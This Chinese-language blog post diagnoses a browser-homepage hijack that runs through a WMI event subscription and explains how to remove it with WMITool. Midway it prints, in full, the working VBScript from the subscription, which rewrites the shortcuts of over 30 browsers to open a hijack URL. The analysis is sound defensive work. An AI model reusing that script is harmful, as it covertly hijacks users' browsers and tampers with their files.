利用WMITool解决浏览器快捷方式启动参数被篡改以及浏览器主页被劫持的问题

先说说症状

症状①：通过快捷方式启动浏览器，首页跳转到2345以及hao123网址导航页，切系统内安装的多款浏览器（IE、Chrome、Firefox、Opera、Safari、Maxthon）症状相同

症状②：金山毒霸会提示浏览器快捷方式异常，并删除该快捷方式

 

分析问题

从毒霸删除的文件中恢复快捷方式，查看快捷方式属性，如下图，可以看出，快捷方式的目标被添加了启动参数

考虑到可能因为启动项、服务、注册表、事件和任务计划造成，但这些地方均未查出任何信息。

后来通过金山毒霸、NOD32等杀毒软件扫描全盘，也未查出任何问题。

再后来想到了使用ProcessMonitor进行监视，发现每隔一段时间（我这里大概是半个小时的样子）出现一个scrcons.exe进程自动启动并修改快捷方式的命令，然后自动关闭（幸好是半个小时一次，要是3、5小时一次，那我估计得疯了吧…）

查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。
要查看WMI事件，下载WMITool并安装，

安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root\CIMV2”，确定，出现下图：

 

在右侧选中后右击 -> 选择view instant properties

 

On Error Resume Next:Const link = "http://hao.ttmmt.com/?v=1030":Const link360 = "http://hao.ttmmt.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

 查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上"http://hao.ttmmt.com/?v=1030"（总算把你揪出来了，藏得够深的）

受到影响的浏览器基本涵盖了市面上现有的所有浏览器（30余款），如下：

"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

 

解决办法：

选中左侧选项，右键 -> 删除！

删不掉？ 到WMITool安装路径（例如：D:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！再行删之！

还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的"http://hao.ttmmt.com/?v=1030"去掉！

希望大家能够把这解决方法普及开来...